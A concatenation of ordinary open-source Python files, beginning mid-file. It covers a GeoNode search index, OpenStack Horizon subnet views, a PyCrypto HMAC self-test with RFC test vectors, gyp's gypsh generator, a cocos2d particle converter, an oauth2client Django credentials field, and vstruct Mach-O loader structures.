bbox_top = indexes.FloatField(model_attr="bbox_y1", null=True, stored=False)
temporal_extent_start = indexes.DateTimeField(
model_attr="temporal_extent_start",
null=True,
stored=False)
temporal_extent_end = indexes.DateTimeField(
model_attr="temporal_extent_end",
null=True,
stored=False)
keywords = indexes.MultiValueField(
model_attr="keyword_slug_list",
null=True,
faceted=True,
stored=True)
regions = indexes.MultiValueField(
model_attr="region_name_list",
null=True,
faceted=True,
stored=True)
popular_count = indexes.IntegerField(
model_attr="popular_count",
default=0,
boost=20)
share_count = indexes.IntegerField(model_attr="share_count", default=0)
rating = indexes.IntegerField(null=True)
num_ratings = indexes.IntegerField(stored=False)
num_comments = indexes.IntegerField(stored=False)
def get_model(self):
return Document
def prepare_type(self, obj):
return "document"
def prepare_rating(self, obj):
ct = ContentType.objects.get_for_model(obj)
try:
rating = OverallRating.objects.filter(
object_id=obj.pk,
content_type=ct
).aggregate(r=Avg("rating"))["r"]
return float(str(rating or "0"))
except OverallRating.DoesNotExist:
return 0.0
def prepare_num_ratings(self, obj):
ct = ContentType.objects.get_for_model(obj)
try:
return OverallRating.objects.filter(
object_id=obj.pk,
content_type=ct
).all().count()
except OverallRating.DoesNotExist:
return 0
def prepare_num_comments(self, obj):
try:
return Comment.objects.filter(
object_id=obj.pk,
content_type=ContentType.objects.get_for_model(obj)
).all().count()
except:
return 0
def prepare_title_sortable(self, obj):
return obj.title.lower().lstrip()
| gpl-3.0 |
yeming233/horizon | openstack_dashboard/dashboards/admin/networks/subnets/views.py | 6 | 1903 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from openstack_dashboard.dashboards.project.networks.subnets \
import views as project_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import tables as admin_tables
from openstack_dashboard.dashboards.admin.networks.subnets import workflows
class CreateView(project_views.CreateView):
workflow_class = workflows.CreateSubnet
class UpdateView(project_views.UpdateView):
workflow_class = workflows.UpdateSubnet
class DetailView(project_views.DetailView):
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
subnet = context['subnet']
table = admin_tables.SubnetsTable(self.request,
network_id=subnet.network_id)
context["actions"] = table.render_row_actions(subnet)
context["url"] = \
reverse("horizon:admin:networks:subnets_tab",
args=[subnet.network_id])
return context
@staticmethod
def get_network_detail_url(network_id):
return reverse('horizon:admin:networks:detail',
args=(network_id,))
@staticmethod
def get_redirect_url():
return reverse('horizon:admin:networks:index')
| apache-2.0 |
nmercier/linux-cross-gcc | linux/lib/python2.7/dist-packages/Crypto/SelfTest/Hash/test_HMAC.py | 117 | 8197 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/HMAC.py: Self-test for the HMAC module
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Hash.HMAC"""
__revision__ = "$Id$"
from common import dict # For compatibility with Python 2.1 and 2.2
from Crypto.Util.py3compat import *
# This is a list of (key, data, results, description) tuples.
test_data = [
## Test vectors from RFC 2202 ##
# Test that the default hashmod is MD5
('0b' * 16,
'4869205468657265',
dict(default='9294727a3638bb1c13f48ef8158bfc9d'),
'default-is-MD5'),
# Test case 1 (MD5)
('0b' * 16,
'4869205468657265',
dict(MD5='9294727a3638bb1c13f48ef8158bfc9d'),
'RFC 2202 #1-MD5 (HMAC-MD5)'),
# Test case 1 (SHA1)
('0b' * 20,
'4869205468657265',
dict(SHA1='b617318655057264e28bc0b6fb378c8ef146be00'),
'RFC 2202 #1-SHA1 (HMAC-SHA1)'),
# Test case 2
('4a656665',
'7768617420646f2079612077616e7420666f72206e6f7468696e673f',
dict(MD5='750c783e6ab0b503eaa86e310a5db738',
SHA1='effcdf6ae5eb2fa2d27416d5f184df9c259a7c79'),
'RFC 2202 #2 (HMAC-MD5/SHA1)'),
# Test case 3 (MD5)
('aa' * 16,
'dd' * 50,
dict(MD5='56be34521d144c88dbb8c733f0e8b3f6'),
'RFC 2202 #3-MD5 (HMAC-MD5)'),
# Test case 3 (SHA1)
('aa' * 20,
'dd' * 50,
dict(SHA1='125d7342b9ac11cd91a39af48aa17b4f63f175d3'),
'RFC 2202 #3-SHA1 (HMAC-SHA1)'),
# Test case 4
('0102030405060708090a0b0c0d0e0f10111213141516171819',
'cd' * 50,
dict(MD5='697eaf0aca3a3aea3a75164746ffaa79',
SHA1='4c9007f4026250c6bc8414f9bf50c86c2d7235da'),
'RFC 2202 #4 (HMAC-MD5/SHA1)'),
# Test case 5 (MD5)
('0c' * 16,
'546573742057697468205472756e636174696f6e',
dict(MD5='56461ef2342edc00f9bab995690efd4c'),
'RFC 2202 #5-MD5 (HMAC-MD5)'),
# Test case 5 (SHA1)
# NB: We do not implement hash truncation, so we only test the full hash here.
('0c' * 20,
'546573742057697468205472756e636174696f6e',
dict(SHA1='4c1a03424b55e07fe7f27be1d58bb9324a9a5a04'),
'RFC 2202 #5-SHA1 (HMAC-SHA1)'),
# Test case 6
('aa' * 80,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b6579202d2048617368204b6579204669727374',
dict(MD5='6b1ab7fe4bd7bf8f0b62e6ce61b9d0cd',
SHA1='aa4ae5e15272d00e95705637ce8a3b55ed402112'),
'RFC 2202 #6 (HMAC-MD5/SHA1)'),
# Test case 7
('aa' * 80,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b657920616e64204c6172676572205468616e204f6e6520426c6f636b2d'
+ '53697a652044617461',
dict(MD5='6f630fad67cda0ee1fb1f562db3aa53e',
SHA1='e8e99d0f45237d786d6bbaa7965c7808bbff1a91'),
'RFC 2202 #7 (HMAC-MD5/SHA1)'),
## Test vectors from RFC 4231 ##
# 4.2. Test Case 1
('0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b',
'4869205468657265',
dict(SHA256='''
b0344c61d8db38535ca8afceaf0bf12b
881dc200c9833da726e9376c2e32cff7
'''),
'RFC 4231 #1 (HMAC-SHA256)'),
# 4.3. Test Case 2 - Test with a key shorter than the length of the HMAC
# output.
('4a656665',
'7768617420646f2079612077616e7420666f72206e6f7468696e673f',
dict(SHA256='''
5bdcc146bf60754e6a042426089575c7
5a003f089d2739839dec58b964ec3843
'''),
'RFC 4231 #2 (HMAC-SHA256)'),
# 4.4. Test Case 3 - Test with a combined length of key and data that is
# larger than 64 bytes (= block-size of SHA-224 and SHA-256).
('aa' * 20,
'dd' * 50,
dict(SHA256='''
773ea91e36800e46854db8ebd09181a7
2959098b3ef8c122d9635514ced565fe
'''),
'RFC 4231 #3 (HMAC-SHA256)'),
# 4.5. Test Case 4 - Test with a combined length of key and data that is
# larger than 64 bytes (= block-size of SHA-224 and SHA-256).
('0102030405060708090a0b0c0d0e0f10111213141516171819',
'cd' * 50,
dict(SHA256='''
82558a389a443c0ea4cc819899f2083a
85f0faa3e578f8077a2e3ff46729665b
'''),
'RFC 4231 #4 (HMAC-SHA256)'),
# 4.6. Test Case 5 - Test with a truncation of output to 128 bits.
#
# Not included because we do not implement hash truncation.
#
# 4.7. Test Case 6 - Test with a key larger than 128 bytes (= block-size of
# SHA-384 and SHA-512).
('aa' * 131,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b6579202d2048617368204b6579204669727374',
dict(SHA256='''
60e431591ee0b67f0d8a26aacbf5b77f
8e0bc6213728c5140546040f0ee37f54
'''),
'RFC 4231 #6 (HMAC-SHA256)'),
# 4.8. Test Case 7 - Test with a key and data that is larger than 128 bytes
# (= block-size of SHA-384 and SHA-512).
('aa' * 131,
'5468697320697320612074657374207573696e672061206c6172676572207468'
+ '616e20626c6f636b2d73697a65206b657920616e642061206c61726765722074'
+ '68616e20626c6f636b2d73697a6520646174612e20546865206b6579206e6565'
+ '647320746f20626520686173686564206265666f7265206265696e6720757365'
+ '642062792074686520484d414320616c676f726974686d2e',
dict(SHA256='''
9b09ffa71b942fcb27635fbcd5b0e944
bfdc63644f0713938a7f51535c3a35e2
'''),
'RFC 4231 #7 (HMAC-SHA256)'),
]
hashlib_test_data = [
# Test case 8 (SHA224)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA224='a30e01098bc6dbbf45690f3a7e9e6d0f8bbea2a39e6148008fd05e44'),
'RFC 4634 8.4 SHA224 (HMAC-SHA224)'),
# Test case 9 (SHA384)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA384='af45d2e376484031617f78d2b58a6b1b9c7ef464f5a01b47e42ec3736322445e8e2240ca5e69e2c78b3239ecfab21649'),
'RFC 4634 8.4 SHA384 (HMAC-SHA384)'),
# Test case 10 (SHA512)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA512='164b7a7bfcf819e2e395fbe73b56e0a387bd64222e831fd610270cd7ea2505549758bf75c05a994a6d034f65f8f0e6fdcaeab1a34d4a6b4b636e070a38bce737'),
'RFC 4634 8.4 SHA512 (HMAC-SHA512)'),
]
def get_tests(config={}):
global test_data
from Crypto.Hash import HMAC, MD5, SHA as SHA1, SHA256
from common import make_mac_tests
hashmods = dict(MD5=MD5, SHA1=SHA1, SHA256=SHA256, default=None)
try:
from Crypto.Hash import SHA224, SHA384, SHA512
hashmods.update(dict(SHA224=SHA224, SHA384=SHA384, SHA512=SHA512))
test_data += hashlib_test_data
except ImportError:
import sys
sys.stderr.write("SelfTest: warning: not testing HMAC-SHA224/384/512 (not available)\n")
return make_mac_tests(HMAC, "HMAC", test_data, hashmods)
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| bsd-3-clause |
raskolnikova/infomaps | node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py | 2779 | 1665 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
generator_default_variables = {
}
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
locals = {
'target_list': target_list,
'target_dicts': target_dicts,
'data': data,
}
# Use a banner that looks like the stock Python one and like what
# code.interact uses by default, but tack on something to indicate what
# locals are available, and identify gypsh.
banner='Python %s on %s\nlocals.keys() = %s\ngypsh' % \
(sys.version, sys.platform, repr(sorted(locals.keys())))
code.interact(banner, local=locals)
| mit |
lcf8858/Sample_Lua | frameworks/cocos2d-x/tools/particle/convert_YCoordFlipped.py | 124 | 2224 | #!/usr/bin/python
#ConvertYCoordFlipped.py
import plistlib
import os.path
import argparse
import glob
import shutil
#keys in dictionary
metaDataKey = 'metaData'
yCoordFlippedConvertedKey = 'yCoordFlippedConverted'
yCoordFlippedKey = 'yCoordFlipped'
#check if the particle file has been converted
def checkFlippedConvertFlag(plistDict):
if(not plistDict.has_key(metaDataKey)):
return False
else:
metaDict = plistDict.get(metaDataKey)
if(not metaDict.has_key(yCoordFlippedConvertedKey)):
return False
else:
return metaDict.get(yCoordFlippedConvertedKey) is 1
#write flag to indicate the file has been converted
def writeFlippedConvertFlag(plistDict):
metaDict = dict()
metaDict.update(yCoordFlippedConverted = 1)
plistDict.update(metaData = metaDict)
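# After this call the plist contains, roughly, the structure that
# checkFlippedConvertFlag() looks for on a later run:
# {'yCoordFlipped': ..., 'metaData': {'yCoordFlippedConverted': 1}, ...}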
#process file
def processConvertFile(filename):
#print a line to seperate files
print ('')
if(not os.path.isfile(filename)):
print(filename + ' does not exist!')
return
print('Begin processing particle file: ' + filename)
fp = open(filename, 'r')
pl = plistlib.readPlist(fp)
if (not pl.has_key(yCoordFlippedKey)):
print('Skip plist file: ' + filename + ' because it has no yCoordFlipped key')
else:
if(not checkFlippedConvertFlag(pl)):
backupFileName = filename+'.backup'
print('Write backup file to ' + backupFileName)
shutil.copyfile(filename,backupFileName)
print('converting...')
pl[yCoordFlippedKey] = -pl[yCoordFlippedKey]
writeFlippedConvertFlag(pl)
print('converted...')
print('Write new plist file to ' + filename)
plistlib.writePlist(pl,filename)
else:
print('Skip a converted file ' + filename)
# -------------- entrance --------------
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("file", nargs = "+",help = "specify a file or a patten")
#argparser.add_argument("-r", "--recursive",action = "store_true", help = "recursive folder or not")
args = argparser.parse_args()
for file in args.file:
processConvertFile(file)
| mit |
achang97/YouTunes | lib/python2.7/site-packages/oauth2client/contrib/django_util/models.py | 32 | 2742 | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains classes used for the Django ORM storage."""
import base64
import pickle
from django.db import models
from django.utils import encoding
import jsonpickle
import oauth2client
class CredentialsField(models.Field):
"""Django ORM field for storing OAuth2 Credentials."""
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return 'BinaryField'
def from_db_value(self, value, expression, connection, context):
"""Overrides ``models.Field`` method. This converts the value
returned from the database to an instance of this class.
"""
return self.to_python(value)
def to_python(self, value):
"""Overrides ``models.Field`` method. This is used to convert
bytes (from serialization etc) to an instance of this class"""
if value is None:
return None
elif isinstance(value, oauth2client.client.Credentials):
return value
else:
try:
return jsonpickle.decode(
base64.b64decode(encoding.smart_bytes(value)).decode())
except ValueError:
return pickle.loads(
base64.b64decode(encoding.smart_bytes(value)))
def get_prep_value(self, value):
"""Overrides ``models.Field`` method. This is used to convert
the value from an instances of this class to bytes that can be
inserted into the database.
"""
if value is None:
return None
else:
return encoding.smart_text(
base64.b64encode(jsonpickle.encode(value).encode()))
def value_to_string(self, obj):
"""Convert the field value from the provided model to a string.
Used during model serialization.
Args:
obj: db.Model, model object
Returns:
string, the serialized field value
"""
value = self._get_val_from_obj(obj)
return self.get_prep_value(value)
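# A minimal usage sketch, not part of this module (the model and field names
# below are assumptions): the field is declared on an ordinary Django model so
# that one oauth2client Credentials object can be stored per user.
#
#     from django.conf import settings
#     from django.db import models
#
#     class CredentialsModel(models.Model):
#         user = models.OneToOneField(settings.AUTH_USER_MODEL,
#                                     primary_key=True,
#                                     on_delete=models.CASCADE)
#         credential = CredentialsField()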
| mit |
jit/pyew | vstruct/defs/macho/loader.py | 18 | 18784 | import vstruct
from vstruct.primitives import *
from vstruct.defs.macho.const import *
vm_prot_t = v_uint32
cpu_type_t = v_uint32
cpu_subtype_t = v_uint32
lc_str = v_uint32
class mach_header(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.magic = v_uint32() # mach magic number identifier
self.cputype = cpu_type_t() # cpu specifier
self.cpusubtype = cpu_subtype_t() # machine specifier
self.filetype = v_uint32() # type of file
self.ncmds = v_uint32() # number of load commands
self.sizeofcmds = v_uint32() # the size of all the load commands
self.flags = v_uint32() # flags
def vsParse(self, bytes, offset=0):
# Over-ride this so we can do the parse, and make sure we
# had the right endianness.
ret = vstruct.VStruct.vsParse(self, bytes, offset=offset)
if self.magic == MH_CIGAM:
self._vs_fmtbase = '>'
ret = vstruct.VStruct.vsParse(self, bytes, offset=offset)
return ret
class mach_header_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.magic = v_uint32() # mach magic number identifier
self.cputype = cpu_type_t() # cpu specifier
self.cpusubtype = cpu_subtype_t() # machine specifier
self.filetype = v_uint32() # type of file
self.ncmds = v_uint32() # number of load commands
self.sizeofcmds = v_uint32() # the size of all the load commands
self.flags = v_uint32() # flags
self.reserved = v_uint32() # reserved
# FIXME all commands should subclass this one!
class load_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # type of load command
self.cmdsize = v_uint32() # total size of command in bytes
class segment_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SEGMENT
self.cmdsize = v_uint32() # includes sizeof section structs
self.segname = v_str(size=16) # segment name
self.vmaddr = v_uint32() # memory address of this segment
self.vmsize = v_uint32() # memory size of this segment
self.fileoff = v_uint32() # file offset of this segment
self.filesize = v_uint32() # amount to map from the file
self.maxprot = vm_prot_t() # maximum VM protection
self.initprot = vm_prot_t() # initial VM protection
self.nsects = v_uint32() # number of sections in segment
self.flags = v_uint32() # flags
class segment_command_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SEGMENT_64
self.cmdsize = v_uint32() # includes sizeof section_64 structs
self.segname[16] = v_uint8() # segment name
self.vmaddr = v_uint64() # memory address of this segment
self.vmsize = v_uint64() # memory size of this segment
self.fileoff = v_uint64() # file offset of this segment
self.filesize = v_uint64() # amount to map from the file
self.maxprot = vm_prot_t() # maximum VM protection
self.initprot = vm_prot_t() # initial VM protection
self.nsects = v_uint32() # number of sections in segment
self.flags = v_uint32() # flags
class section(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.sectname = v_str(size=16) # name of this section
self.segname = v_str(size=16) # segment this section goes in
self.addr = v_uint32() # memory address of this section
self.size = v_uint32() # size in bytes of this section
self.offset = v_uint32() # file offset of this section
self.align = v_uint32() # section alignment (power of 2)
self.reloff = v_uint32() # file offset of relocation entries
self.nreloc = v_uint32() # number of relocation entries
self.flags = v_uint32() # flags (section type and attributes)
self.reserved1 = v_uint32() # reserved (for offset or index)
self.reserved2 = v_uint32() # reserved (for count or sizeof)
class section_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.sectname = v_str(size=16) # name of this section
self.segname = v_str(size=16) # segment this section goes in
self.addr = v_uint64() # memory address of this section
self.size = v_uint64() # size in bytes of this section
self.offset = v_uint32() # file offset of this section
self.align = v_uint32() # section alignment (power of 2)
self.reloff = v_uint32() # file offset of relocation entries
self.nreloc = v_uint32() # number of relocation entries
self.flags = v_uint32() # flags (section type and attributes)
self.reserved1 = v_uint32() # reserved (for offset or index)
self.reserved2 = v_uint32() # reserved (for count or sizeof)
self.reserved3 = v_uint32() # reserved
class fvmlib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_IDFVMLIB or LC_LOADFVMLIB
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # library's target pathname
self.minor_version = v_uint32() # library's minor version number
self.header_addr = v_uint32() # library's header address
class dylib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ID_DYLIB, LC_LOAD_{,WEAK_}DYLIB, LC_REEXPORT_DYLIB
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # library's path name
self.timestamp = v_uint32() # library's build time stamp
self.current_version = v_uint32() # library's current version number
self.compatibility_version = v_uint32() # library's compatibility vers number
self.namedata = v_bytes(size=0)
def vsParse(self, bytes, offset=0):
# So we can grab the name data
retoff = vstruct.VStruct.vsParse(self, bytes, offset=offset)
# Grab the name from the inline data...
name = bytes[ offset + self.name : offset + self.cmdsize ]
self.namedata = name.split('\x00', 1)[0]
return retoff
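# (self.name is an lc_str: a byte offset from the start of this load command
# to an inline, NUL-terminated path string, which is why the slice above
# starts at offset + self.name and runs to the end of the command.)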
class sub_framework_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_FRAMEWORK
self.cmdsize = v_uint32() # includes umbrella string
self.umbrella = lc_str() # the umbrella framework name
class sub_client_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_CLIENT
self.cmdsize = v_uint32() # includes client string
self.client = lc_str() # the client name
class sub_umbrella_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_UMBRELLA
self.cmdsize = v_uint32() # includes sub_umbrella string
self.sub_umbrella = lc_str() # the sub_umbrella framework name
class sub_library_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_LIBRARY
self.cmdsize = v_uint32() # includes sub_library string
self.sub_library = lc_str() # the sub_library name
class prebound_dylib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_PREBOUND_DYLIB
self.cmdsize = v_uint32() # includes strings
self.name = lc_str() # library's path name
self.nmodules = v_uint32() # number of modules in library
self.linked_modules = lc_str() # bit vector of linked modules
class dylinker_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ID_DYLINKER or LC_LOAD_DYLINKER
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # dynamic linker's path name
class thread_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_THREAD or LC_UNIXTHREAD
self.cmdsize = v_uint32() # total size of this command
class routines_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ROUTINES
self.cmdsize = v_uint32() # total size of this command
self.init_address = v_uint32() # address of initialization routine
        self.init_module = v_uint32() # index into the module table that the init routine is defined in
self.reserved1 = v_uint32()
self.reserved2 = v_uint32()
self.reserved3 = v_uint32()
self.reserved4 = v_uint32()
self.reserved5 = v_uint32()
self.reserved6 = v_uint32()
class routines_command_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ROUTINES_64
self.cmdsize = v_uint32() # total size of this command
self.init_address = v_uint64() # address of initialization routine
        self.init_module = v_uint64() # index into the module table that the init routine is defined in
self.reserved1 = v_uint64()
self.reserved2 = v_uint64()
self.reserved3 = v_uint64()
self.reserved4 = v_uint64()
self.reserved5 = v_uint64()
self.reserved6 = v_uint64()
class symtab_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SYMTAB
self.cmdsize = v_uint32() # sizeof(struct symtab_command)
self.symoff = v_uint32() # symbol table offset
self.nsyms = v_uint32() # number of symbol table entries
self.stroff = v_uint32() # string table offset
self.strsize = v_uint32() # string table size in bytes
class dysymtab_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_DYSYMTAB
self.cmdsize = v_uint32() # sizeof(struct dysymtab_command)
self.ilocalsym = v_uint32() # index to local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextdefsym = v_uint32() # index to externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.iundefsym = v_uint32() # index to undefined symbols
self.nundefsym = v_uint32() # number of undefined symbols
self.tocoff = v_uint32() # file offset to table of contents
self.ntoc = v_uint32() # number of entries in table of contents
self.modtaboff = v_uint32() # file offset to module table
self.nmodtab = v_uint32() # number of module table entries
self.extrefsymoff = v_uint32() # offset to referenced symbol table
self.nextrefsyms = v_uint32() # number of referenced symbol table entries
self.indirectsymoff = v_uint32() # file offset to the indirect symbol table
self.nindirectsyms = v_uint32() # number of indirect symbol table entries
self.extreloff = v_uint32() # offset to external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.locreloff = v_uint32() # offset to local relocation entries
self.nlocrel = v_uint32() # number of local relocation entries
class dylib_table_of_contents(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.symbol_index = v_uint32() # the defined external symbol (index into the symbol table)
self.module_index = v_uint32() # index into the module table this symbol is defined in
class dylib_module(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.module_name = v_uint32() # the module name (index into string table)
self.iextdefsym = v_uint32() # index into externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.irefsym = v_uint32() # index into reference symbol table
self.nrefsym = v_uint32() # number of reference symbol table entries
self.ilocalsym = v_uint32() # index into symbols for local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextrel = v_uint32() # index into external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.iinit_iterm = v_uint32() # low 16 bits are the index into the init section, high 16 bits are the index into the term section
self.ninit_nterm = v_uint32() # low 16 bits are the number of init section entries, high 16 bits are the number of term section entries
self.objc_module_info_addr = v_uint32() # the (__OBJC,__module_info) section
self.objc_module_info_size = v_uint32() # the (__OBJC,__module_info) section
class dylib_module_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.module_name = v_uint32() # the module name (index into string table)
self.iextdefsym = v_uint32() # index into externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.irefsym = v_uint32() # index into reference symbol table
self.nrefsym = v_uint32() # number of reference symbol table entries
self.ilocalsym = v_uint32() # index into symbols for local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextrel = v_uint32() # index into external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.iinit_iterm = v_uint32() # low 16 bits are the index into the init section, high 16 bits are the index into the term section
self.ninit_nterm = v_uint32() # low 16 bits are the number of init section entries, high 16 bits are the number of term section entries
self.objc_module_info_size = v_uint32() # the (__OBJC,__module_info) section
self.objc_module_info_addr = v_uint64() # the (__OBJC,__module_info) section
class dylib_reference(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.flags = v_uint32() # flags to indicate the type of reference
class twolevel_hints_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_TWOLEVEL_HINTS
self.cmdsize = v_uint32() # sizeof(struct twolevel_hints_command)
self.offset = v_uint32() # offset to the hint table
self.nhints = v_uint32() # number of hints in the hint table
class twolevel_hint(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.itoc = v_uint32() # index into the table of contents
class prebind_cksum_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_PREBIND_CKSUM
self.cmdsize = v_uint32() # sizeof(struct prebind_cksum_command)
self.cksum = v_uint32() # the check sum or zero
class uuid_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_UUID
self.cmdsize = v_uint32() # sizeof(struct uuid_command)
        self.uuid = v_bytes(size=16) # the 128-bit uuid
class rpath_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_RPATH
self.cmdsize = v_uint32() # includes string
self.path = lc_str() # path to add to run path
class linkedit_data_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_CODE_SIGNATURE or LC_SEGMENT_SPLIT_INFO
self.cmdsize = v_uint32() # sizeof(struct linkedit_data_command)
self.dataoff = v_uint32() # file offset of data in __LINKEDIT segment
self.datasize = v_uint32() # file size of data in __LINKEDIT segment
class encryption_info_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ENCRYPTION_INFO
self.cmdsize = v_uint32() # sizeof(struct encryption_info_command)
self.cryptoff = v_uint32() # file offset of encrypted range
self.cryptsize = v_uint32() # file size of encrypted range
self.cryptid = v_uint32() # which enryption system, 0 means not-encrypted yet
class symseg_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SYMSEG
self.cmdsize = v_uint32() # sizeof(struct symseg_command)
self.offset = v_uint32() # symbol segment offset
self.size = v_uint32() # symbol segment size in bytes
